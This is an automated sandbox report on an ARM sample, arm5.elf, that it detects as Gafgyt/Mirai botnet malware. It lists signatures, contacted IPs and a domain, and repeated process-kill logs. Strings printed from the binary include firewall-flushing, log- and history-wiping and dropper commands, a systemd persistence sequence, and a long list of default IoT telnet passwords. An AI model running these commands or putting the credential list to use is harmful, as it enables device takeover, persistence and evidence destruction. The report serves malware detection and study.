Linux Analysis Report
arm5.elf

Overview

General Information

Sample name: arm5.elf
Analysis ID: 1526772
MD5: cdac974b2ab6e445d718356feb3a2f73
SHA1: 5c447e7670af022c2bb7b8fb5b3f3aaa4851e0f0
SHA256: 01fd9fb670cd8dedeb43207a633baf548fcba872312aad3e40233a16a305cda7
Tags: user-elfdigest
Infos:

Detection

Gafgyt, Mirai
Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Yara detected Mirai
Executes the "iptables" command to insert, remove and/or manipulate rules
Manipulation of devices in /dev
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Tries to stop the "iptables" service
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension

Classification

Name Description Attribution Blogpost URLs Link
Bashlite, Gafgyt Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: arm5.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: arm5.elf Virustotal: Detection: 37% Perma Link
Source: arm5.elf ReversingLabs: Detection: 55%
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 6248) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6254) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 6258) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior

Networking
barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 6623) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6597) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Tries to stop the "iptables" service
Source: /usr/sbin/service (PID: 6263) Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 6263) Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:60964 -> 156.238.224.214:8443
Source: global traffic TCP traffic: 192.168.2.23:36000 -> 212.118.43.167:2222
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 6239) Iptables executable: /usr/sbin/iptables -> iptables -F Jump to behavior
Source: /bin/sh (PID: 6272) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 6273) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
Source: /bin/sh (PID: 6623) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 6597) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Sample listens on a socket
Source: /tmp/arm5.elf (PID: 6217) Socket: 127.0.0.1:8013 Jump to behavior
Source: /tmp/arm5.elf (PID: 6581) Socket: 0.0.0.0:31337 Jump to behavior
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown UDP traffic detected without corresponding DNS query: 51.77.149.139
Source: unknown UDP traffic detected without corresponding DNS query: 51.77.149.139
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 51.254.162.59
Source: unknown UDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknown UDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 51.77.149.139
Source: unknown UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 91.217.137.37
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 94.16.114.254
Source: unknown UDP traffic detected without corresponding DNS query: 134.195.4.2
Source: global traffic DNS traffic detected: DNS query: octopus1337.geek
Source: arm5.elf String found in binary or memory: http://Change_ip/octopus_re.sh;chmod
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary
barindex
Sample tries to kill multiple processes (SIGKILL)
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6334, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6376, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6379, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6382, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6331, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6427, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6429, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6422, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6430, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6471, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6473, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6468, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6475, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6474, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6478, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6479, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6517, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6525, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6526, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6503, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6533, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6534, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6559, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6604, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6633, result: no such process Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 796, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 799, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1349, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1389, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1463, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1465, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1477, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1489, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1579, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1582, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1586, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1594, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1599, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1622, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1623, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1627, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1629, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1632, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1633, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1638, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1639, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1642, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1648, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1654, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1656, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1661, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1664, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1668, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1698, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1699, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1809, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1888, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1890, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2009, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2018, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2033, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2038, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2077, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2078, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2079, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2080, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2083, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2084, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2114, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2128, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2129, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2146, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2156, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2180, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2195, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2208, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2226, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2235, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2242, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2275, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2281, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2285, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2289, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2294, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2307, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2637, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 3236, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6241, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6484, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6531, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6532, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6534, result: no such process Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6596, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6633, result: successful Jump to behavior
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: pkill -9 busybox
Source: Initial sample String containing 'busybox' found: armrm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmprm -rf /tmp/*iptables -Fpkill -9 busyboxpkill -9 perlpkill -9 pythonservice iptables stop/sbin/iptables -F; /sbin/iptables -Xservice firewall stophistory -crm -rf ~/.bash_historyhistory -w0.0.0.0
Source: Initial sample String containing 'busybox' found: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
Source: Initial sample String containing 'busybox' found: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
Source: Initial sample String containing 'busybox' found: systemctl daemon-reload;systemctl enable nginnx.service;systemctl start nginnx.service;sh -c systemctl daemon-reload;systemctl enable nginnxsshd%x/dev/watchdog/dev/misc/watchdogwatchdogrootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxpasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetciscosetsockoptbindlisten1.1.1.1hi im here, i think/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbusybox iptables -A INPUT
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Sample tries to kill a process (SIGKILL)
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6334, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6376, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6379, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6382, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6331, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6427, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6429, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6422, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6430, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6471, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6473, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6468, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6475, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6474, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6478, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6479, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6517, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6525, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6526, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6503, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6533, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6534, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6559, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6604, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6295) SIGKILL sent: pid: 6633, result: no such process Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 796, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 799, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1349, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1389, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1463, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1465, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1477, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1489, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1579, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1582, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1586, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1594, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1599, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1622, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1623, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1627, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1629, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1632, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1633, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1638, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1639, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1642, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1648, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1654, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1656, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1661, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1664, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1668, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1698, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1699, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1809, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1888, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 1890, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2009, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2018, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2033, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2038, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2077, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2078, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2079, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2080, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2083, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2084, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2114, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2128, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2129, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2146, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2156, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2180, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2195, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2208, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2226, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2235, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2242, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2275, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2281, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2285, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2289, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2294, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2307, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 2637, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 3236, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6241, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6484, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6531, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6532, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6534, result: no such process Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6596, result: successful Jump to behavior
Source: /tmp/arm5.elf (PID: 6297) SIGKILL sent: pid: 6633, result: successful Jump to behavior
Source: classification engine Classification label: mal96.spre.troj.evad.linELF@0/2@46/0

Data Obfuscation
barindex
Manipulation of devices in /dev
Source: /tmp/arm5.elf (PID: 6299) Written: /dev/ocmount Jump to behavior

Persistence and Installation Behavior
barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 6623) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
